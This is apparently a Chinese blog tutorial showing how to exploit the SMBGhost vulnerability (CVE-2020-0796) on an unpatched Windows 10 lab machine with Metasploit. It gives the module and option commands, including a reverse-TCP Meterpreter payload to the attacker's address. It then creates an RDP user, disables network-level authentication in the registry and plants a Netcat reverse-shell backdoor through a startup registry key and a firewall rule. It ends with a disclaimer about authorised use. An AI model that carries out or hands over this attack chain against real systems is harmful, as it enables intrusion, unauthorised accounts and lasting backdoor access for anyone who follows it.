掌握安全渗透测试:利用永恒之黑漏洞获取Windows 10系统访问权限

以下是利用永恒之黑漏洞对Windows 10进行渗透测试的步骤:

环境介绍

  • 靶机 :IP地址为192.168.1.60,运行Windows 10 1903版本。
  • 攻击机 :IP地址为192.168.1.53

靶机准备

  1. 检查Windows 10版本号:确保靶机运行的Windows 10版本受到永恒之黑漏洞(CVE-2020-0796 SMBGhost)的影响。
  2. 检查系统补丁 :确认靶机未安装补丁KB4551762,该补丁修复了永恒之黑漏洞。
  3. 开启445端口:确保靶机的445端口(SMB协议)是开放的。

获取Shell

  1. 使用Metasploit框架

    • 启动Metasploit:msfconsole
    • 使用永恒之黑漏洞模块:use exploit/windows/smb/cve_2020_0796_smbghost
  2. 设置选项

    • 显示模块选项:show options
    • 设置目标主机IP:set RHOSTS 192.168.1.60
    • 设置payload:set payload windows/x64/meterpreter/reverse_tcp
    • 设置攻击机监听IP:set LHOST 192.168.1.53
    • 禁用模拟模式:set DefangedMode false
  3. 执行exploit

    • 运行exploit:exploit

创建新用户并开启远程桌面

  1. 开启RDP远程桌面

    • 使用Metasploit的post/windows/manage/enable_rdp模块开启RDP服务,并创建新用户。
  2. 创建RDP用户

    • 设置用户名和密码:set username xuegodset password 123456
    • 指定会话ID:set session 1
    • 运行模块:run
  3. 检查NLA设置

    • 查询注册表以确定是否开启网络级身份验证(NLA)。
  4. 关闭NLA(如果开启):

    • 修改注册表值SecurityLayerUserAuthentication为0,以允许非NLA的RDP连接。
  5. 连接远程桌面

    • 在Kali上使用rdesktop命令连接到靶机的远程桌面:rdesktop 192.168.1.60

开启后门维持权限访问

  1. 配置后门程序

    • 上传nc(Netcat)到Windows 10系统。
    • 修改注册表添加启动项,以便在系统启动时执行nc反弹shell命令。
  2. 设置防火墙规则

    • 允许443端口的网络访问,以使后门有效。
  3. 重启Windows 10

    • 重启靶机以应用更改,并等待后门程序运行。
  4. 连接后门

    • 在Kali上使用nc命令连接后门:nc -v 192.168.1.60 443
  5. MSF控制台连接(可选):

    • 在Metasploit框架中使用connect命令连接到后门:connect 192.168.1.60 443

总结

  • 文档提供了利用永恒之黑漏洞对Windows 10进行渗透的详细步骤,包括获取初始访问、创建远程桌面用户、开启后门以及维持权限访问。

请注意,这些步骤仅供教育目的,实际操作应在授权的渗透测试和安全研究环境中进行。未经授权的渗透测试可能违反法律。

相关推荐
wanhengidc1 天前
云手机存在的意义是什么
运维·服务器·arm开发·安全·智能手机
碎像1 天前
Windows系统暂停强制更新的操作(超详细说明)
windows
ZhiqianXia1 天前
github 软件安全术语
安全·github
介一安全1 天前
【Web安全】泛微OA框架SRC高频漏洞分析总结
web安全·网络安全·安全性测试
德迅云安全杨德俊1 天前
HTTPS:现代网站运营的安全基石与价值引擎
网络协议·安全·https
emma羊羊1 天前
【weblogic】文件上传漏洞
安全·网络安全·靶场·weblogic
jenchoi4131 天前
【2025-11-01】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全
沐矢羽1 天前
upload文件上传漏洞浅析
学习·web安全·网络安全·文件上传·top10
TOM写代码1 天前
详解网络安全免杀对抗:攻防的猫鼠游戏
安全·web安全·网络安全
Pure_White_Sword1 天前
Bugku-Web题目-cookies
web安全·网络安全·ctf